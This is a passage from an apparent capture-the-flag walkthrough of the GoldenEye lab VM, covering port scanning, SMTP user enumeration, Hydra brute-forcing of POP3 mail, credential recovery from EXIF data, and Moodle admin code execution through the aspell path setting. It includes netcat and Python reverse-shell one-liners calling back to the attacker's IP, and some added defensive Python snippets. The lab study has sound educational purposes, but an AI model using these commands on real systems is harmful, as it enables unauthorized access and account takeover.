So I try username boris and password InvincibleHack3r on http://192.168.111.128/sev-home/
We're in!
Nothing really to look at. So I go back to my nmap scan. This time I run a more aggressive scan on the discovered ports:
root@kali:~# nmap -n -v -p 25,80,55007,55006 -T4 -sS -A 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:36 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating Ping Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Completed Ping Scan at 06:36, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:36, 0.06s elapsed (4 total ports)
Initiating Service scan at 06:36
Scanning 4 services on 192.168.111.128
Completed Service scan at 06:36, 31.03s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.128
Initiating Traceroute at 06:36
Completed Traceroute at 06:36, 0.02s elapsed
NSE: Script scanning 192.168.111.128.
Initiating NSE at 06:36
Completed NSE at 06:37, 28.59s elapsed
Initiating NSE at 06:37
Completed NSE at 06:37, 0.01s elapsed
Nmap scan report for 192.168.111.128
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| Hello:
| 220 ubuntu GoldentEye SMTP Electronic-Mail agent
|_ Syntax: EHLO hostname
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: USER CAPA SASL(PLAIN) AUTH-RESP-CODE PIPELINING RESP-CODES UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE RESP-CODES UIDL TOP STLS SASL(PLAIN) CAPA USER PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=8/14%Time=5B72B0A8%P=x86_64-pc-linux-gnu%r(Hell
SF:o,4D,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent\r
SF:\n501\x20Syntax:\x20EHLO\x20hostname\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X|3.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
While I'm at it, I check that boris and natalya are valid users via the SMTP VRFY command:
root@kali:~# nc -nv 192.168.111.128 25
(UNKNOWN) [192.168.111.128] 25 (smtp) open
EHLO hostname
220 ubuntu GoldentEye SMTP Electronic-Mail agent
250-ubuntu
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy boris
252 2.0.0 boris
vrfy natalya
252 2.0.0 natalya
vrfy doesnotexist
550 5.1.1 <doesnotexist>: Recipient address rejected: User unknown in local recipient table
vrfy bond
550 5.1.1 <bond>: Recipient address rejected: User unknown in local recipient table
vrfy james
550 5.1.1 <james>: Recipient address rejected: User unknown in local recipient table
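The replies above (252 for boris and natalya, 550 for the others) are exactly the distinguishing behaviour that makes VRFY a username oracle. As an added example, not taken from the post, the following Python parses such a captured session and reports whether that oracle is present; the transcript is constructed to mirror the exchange above. Postfix's disable_vrfy_command = yes is the usual fix, after which every VRFY gets the same 252 reply and the check returns False.

```python
import re

# Constructed transcript modelled on the nc session above: client commands
# and server replies interleaved as they appear on the terminal.
SAMPLE_TRANSCRIPT = """\
EHLO hostname
250-ubuntu
250-PIPELINING
250-VRFY
250 DSN
vrfy boris
252 2.0.0 boris
vrfy natalya
252 2.0.0 natalya
vrfy doesnotexist
550 5.1.1 <doesnotexist>: Recipient address rejected: User unknown in local recipient table
"""

# Reply Postfix sends for every VRFY when disable_vrfy_command = yes.
HARDENED_REPLY = "252 2.5.2 Send some mail, I'll try my best"

_VRFY = re.compile(r"^vrfy\s+(\S+)\s*$", re.IGNORECASE)
_REPLY = re.compile(r"^(\d{3})[ -]")


def vrfy_replies(transcript: str) -> dict:
    """Map each VRFY argument to the 3-digit code of the reply that followed it."""
    result = {}
    pending = None
    for line in transcript.splitlines():
        m = _VRFY.match(line)
        if m:
            pending = m.group(1)
            continue
        r = _REPLY.match(line)
        if r and pending is not None:
            result[pending] = int(r.group(1))
            pending = None
    return result


def advertises_vrfy(transcript: str) -> bool:
    """True if the EHLO response lists VRFY as a supported extension."""
    return any(re.match(r"^250[ -]VRFY\s*$", l) for l in transcript.splitlines())


def vrfy_oracle(transcript: str) -> bool:
    """True if the server answers VRFY with different codes for different
    names, i.e. it lets a client tell existing accounts from unknown ones.
    A server that replies 252 to everything yields a single code and no oracle."""
    codes = set(vrfy_replies(transcript).values())
    return len(codes) > 1


if __name__ == "__main__":
    print("VRFY advertised:", advertises_vrfy(SAMPLE_TRANSCRIPT))
    print("replies:", vrfy_replies(SAMPLE_TRANSCRIPT))
    print("oracle present:", vrfy_oracle(SAMPLE_TRANSCRIPT))
```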
I also run a nikto scan on the site... hmm nothing exciting:
root@kali:~/Documents/vulnhub/goldeneye# nikto -h http://192.168.111.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.111.128
+ Target Hostname: 192.168.111.128
+ Target Port: 80
+ Start Time: 2018-08-14 06:53:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated: 20 error(s) and 4 item(s) reported on remote host
+ End Time: 2018-08-14 06:53:44 (GMT-4) (0 seconds)
---------------------------------------------------------------------------
So I know boris and natalya are valid users, and I can see a POP3 mail service is hosted on tcp/55007. Except I need credentials. The brute-force tool Hydra has a pop3 module; I'll give that a shot with the fasttrack.txt password list, which is much smaller than rockyou.
First I put boris and natalya into a file:
root@kali:~/Documents/vulnhub/goldeneye# echo "boris" > goldeneye-users.txt
root@kali:~/Documents/vulnhub/goldeneye# echo "natalya" >> goldeneye-users.txt
Now I kick off Hydra:
root@kali:~/Documents/vulnhub/goldeneye# hydra -L goldeneye-users.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 192.168.111.128 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-14 07:04:04
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.111.128 login: boris password: secret1!
[STATUS] 85.00 tries/min, 255 tries in 00:03h, 189 to do in 00:03h, 16 active
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@kali:~/Documents/vulnhub/goldeneye# hydra -R
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
[INFORMATION] reading restore file ./hydra.restore
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-14 07:08:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[55007][pop3] host: 192.168.111.128 login: natalya password: bird
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-14 07:09:08
Two successful passwords!
Now let's read their emails (if they have any?!).
See the following if you want to know how to read pop3 emails via telnet/nc:
https://www.pantz.org/software/pop3/pop3telnet.html
root@kali:~# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu
Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss
Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
.
quit
+OK Logging out.
Perhaps Xenia and admin are valid users?
Let's check Natalya's emails:
root@kali:~# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
quit
+OK Logging out.
Ok, so it looks like xenia is a valid user, and there are some interesting notes here about another internal site.
As the email says, we don't have DNS, so we can add the internal domain hosted on GoldenEye to our hosts file.
First I try using the IP directly, but a redirect is in place so that's not possible; I'll have to add the name to my hosts file.
Just use echo with an append redirect to /etc/hosts:
root@kali:~# echo "192.168.111.128 severnaya-station.com" >> /etc/hosts
Looks like it's working:
root@kali:~# curl severnaya-station.com/gnocertdir
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://severnaya-station.com/gnocertdir/">here</a>.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at severnaya-station.com Port 80</address>
</body></html>
Hmm what do we have here?!
Site backend looks to be running moodle. As per google "Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License"
Any exploits?
root@kali:~# searchsploit moodle
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit) | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection | exploits/php/webapps/41828.php
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection | exploits/php/webapps/28770.txt
Moodle Help Script 1.x - Cross-Site Scripting | exploits/php/webapps/24279.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Just a few :)
There might be some interesting things to try here: RFI and RCE. But first I'll have a look around on the page. I have those xenia creds that'll probably come in use somewhere...
The intro to Goldeneye link takes me to a login page:
The xenia credentials work!
There's a message for Xenia from Dr. Doak. Let's check that out.
Greetings Xenia,
As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.
My email username is...
doak
Thank you,
Cheers,
Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.
Ok, another username: doak.
I don't have creds, but perhaps I should try adding doak and even the user 'admin' to another hydra attack.
I'll put them into another users file:
root@kali:~/Documents/vulnhub/goldeneye# echo "doak" > goldeneye-users2.txt
root@kali:~/Documents/vulnhub/goldeneye# echo "admin" >> goldeneye-users2.txt
I look around the site. There's nothing in terms of courses/blogs or any other info/intel of use.
Based on the message above, perhaps confirming the xenia account will open up some possibilities?
Kick off another hydra...
root@kali:~/Documents/vulnhub/goldeneye# hydra -L goldeneye-users2.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 192.168.111.128 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-16 22:27:09
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.111.128 login: doak password: goat
Oh wow... that worked. Let's see if there's anything interesting in doak's mail...
root@kali:~/Documents/vulnhub/goldeneye# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
.
quit
+OK Logging out.
root@kali:~/Documents/vulnhub/goldeneye#
Sure enough, we have more creds! Let's try logging in to the Moodle site with these.
We're in!
Looking around the site, I couldn't find anything at first, then I came across a folder called 'for james' which contained a s3cret.txt file.
Its contents:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
So I navigate to that URL:
Haha nice. But what do we have here? Perhaps 486 is something? Or maybe the JPEG has some embedded info? Let's see...
Download it:
root@kali:~/Documents/vulnhub/goldeneye# wget http://severnaya-station.com//dir007key/for-007.jpg
--2018-08-16 22:37:28-- http://severnaya-station.com//dir007key/for-007.jpg
Resolving severnaya-station.com (severnaya-station.com)... 192.168.111.128
Connecting to severnaya-station.com (severnaya-station.com)|192.168.111.128|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’
for-007.jpg 100%[===================================================================================================================================================>] 14.55K --.-KB/s in 0s
2018-08-16 22:37:28 (218 MB/s) - ‘for-007.jpg’ saved [14896/14896]
root@kali:~/Documents/vulnhub/goldeneye# exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag |Value
--------------------+----------------------------------------------------------
Image Description |eFdpbnRlcjE5OTV4IQ==
Manufacturer |GoldenEye
Resolution Unit |Inch
Software |linux
Artist |For James
YCbCr Positioning |Centered
X-Resolution |72
Y-Resolution |72
Exif Version |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment |For 007
FlashPixVersion |FlashPix Version 1.0
Color Space |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------
Hmmm, that image description looks suss! Let's base64-decode it...
root@kali:~/Documents/vulnhub/goldeneye# echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!
root@kali:~/Documents/vulnhub/goldeneye#
OK, now that looks like creds to me...
Maybe for the admin user? My hydra run completed without finding anything for the admin user. But let's try the admin user with these new creds...
Winner winner
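Metadata fields are a common hiding place for strings like the one above. As an added example (not from the original post), a small triage script that parses the `exif` tool's table layout and flags any field whose value decodes cleanly from base64 into printable text; the sample output and its base64 value are constructed, not taken from for-007.jpg.

```python
import base64
import re
import string

# Constructed sample in the layout the `exif` CLI prints; the base64 value is
# our own ("U2FtcGxlIQ==" is "Sample!"), not the value from the original image.
SAMPLE_EXIF_OUTPUT = """\
EXIF tags in 'sample.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Image Description   |U2FtcGxlIQ==
Manufacturer        |GoldenEye
Resolution Unit     |Inch
Software            |linux
User Comment        |For 007
X-Resolution        |72
--------------------+----------------------------------------------------------
"""

# Base64 alphabet only, at least 8 characters, optional '=' padding.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
PRINTABLE = set(string.printable)


def parse_exif_table(text):
    """Turn the tool's 'Tag |Value' rows into a dict (our own parser, not libexif's)."""
    tags = {}
    for line in text.splitlines():
        if "|" not in line or line.startswith(("-", "Tag")):
            continue
        tag, _, value = line.partition("|")
        tags[tag.strip()] = value.strip()
    return tags


def decode_if_base64(value):
    """Return decoded text when value is well-formed base64 that yields printable
    ASCII; None otherwise. Ordinary words such as 'GoldenEye' fail the length
    or byte checks, which keeps false positives down."""
    if len(value) % 4 or not BASE64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    if text and all(c in PRINTABLE for c in text):
        return text
    return None


def find_hidden_strings(exif_text):
    """Map each tag whose value decodes cleanly from base64 to the decoded text."""
    return {
        tag: decoded
        for tag, value in parse_exif_table(exif_text).items()
        if (decoded := decode_if_base64(value)) is not None
    }


if __name__ == "__main__":
    for tag, decoded in find_hidden_strings(SAMPLE_EXIF_OUTPUT).items():
        print(f"{tag}: {decoded!r}")
```

To run it against a real file, pipe `exif image.jpg` output into `find_hidden_strings`.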
There's a fair bit to look at in the admin settings, but I come across the System paths settings, where you can set the path to aspell, du and dot. Looks like you can enter system paths! Googling around, this is a known vector for code execution, since whatever is in the aspell path gets run when the spellchecker is invoked.
I start a listener:
root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
And I try updating the aspell path to a reverse shell (hoping nc is installed):
sh -c '(nc 192.168.253.130 443 -e /bin/sh &)'
I create a blog post and run the spellchecker. Hmm, nothing...
Digging further into the settings, it looks like the spellchecker defaults to Google rather than the custom spellchecker program we configured.
Let's change this to PSpellShell.
So I spent hours trying all sorts of reverse shell combos with no success. I went through my usual go-to list:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/
Nothing was working. I later realised my GoldenEye VM was configured to use host-only networking and my Kali machine was using a NAT adapter.
This meant my host's physical adapter could reach the internet and also the GoldenEye VM, but there was no route back for my reverse shell to connect to.
I changed my Kali machine to a host-only adapter on the same subnet as GoldenEye.
My new Kali IP is 192.168.111.129.
Update the aspell path:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Hit spell check on a nonsense new blog post:
root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.111.129] from severnaya-station.com [192.168.111.128] 48560
/bin/sh: 0: can't access tty; job control turned off
$
BINGO!
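The root cause here is that the spellchecker hands the aspell path setting to a shell as a command string, which is why a Python one-liner in that field gave a shell. As an added example from the defender's side (not Moodle's code), a validation and invocation pattern that closes this off: accept only an absolute path to one executable, and exec it as an argv list so the setting can never carry arguments or a command substitution.

```python
import os
import subprocess

# Characters that would let a "path" be read as a shell command line.
SHELL_METACHARS = set(";&|`$()<>'\" \t\n")


def validate_tool_path(path, must_exist=True):
    """Accept only an absolute path to a single executable file.

    Returns (ok, reason). With must_exist=False only the string shape is
    checked, which is enough to reject 'sh -c ...' or 'python -c ...' values.
    """
    if not path:
        return False, "empty"
    if not os.path.isabs(path):
        return False, "not an absolute path"
    if any(c in SHELL_METACHARS for c in path):
        return False, "contains whitespace or shell metacharacters"
    if ".." in path.split("/"):
        return False, "contains parent-directory traversal"
    if must_exist and not (os.path.isfile(path) and os.access(path, os.X_OK)):
        return False, "not an existing executable file"
    return True, "ok"


def run_spellchecker(tool_path, text):
    """Hardened invocation: validate the setting, then exec it as an argv list.

    Because no shell is involved, the configured value can only name a program.
    The weak form would be os.popen(tool_path + " -a"), which hands the whole
    string to /bin/sh and is exactly what made the settings page exploitable.
    """
    ok, reason = validate_tool_path(tool_path)
    if not ok:
        raise ValueError(f"refusing to run spellchecker: {reason}")
    proc = subprocess.run([tool_path, "-a"], input=text, capture_output=True,
                          text=True, timeout=10)
    return proc.stdout


if __name__ == "__main__":
    # Constructed setting values, checked for shape only so this runs anywhere.
    for candidate in ("/usr/bin/aspell", "aspell", "sh -c 'id'",
                      "/usr/bin/aspell;id", "/usr/bin/../bin/aspell"):
        ok, reason = validate_tool_path(candidate, must_exist=False)
        print(f"{candidate!r:28} -> {'accept' if ok else 'reject'} ({reason})")
```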
--> TIME TO PE
Change over to a python tty shell and see what we're working with...
$ python -c 'import pty;pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /
cd /
www-data@ubuntu:/$ hostname
hostname
ubuntu
www-data@ubuntu:/$ uname -ra
uname -ra
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
www-data@ubuntu:/$ ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:2e:e5:d4
inet addr:192.168.111.128 Bcast:192.168.111.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe2e:e5d4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:323 errors:0 dropped:0 overruns:0 frame:0
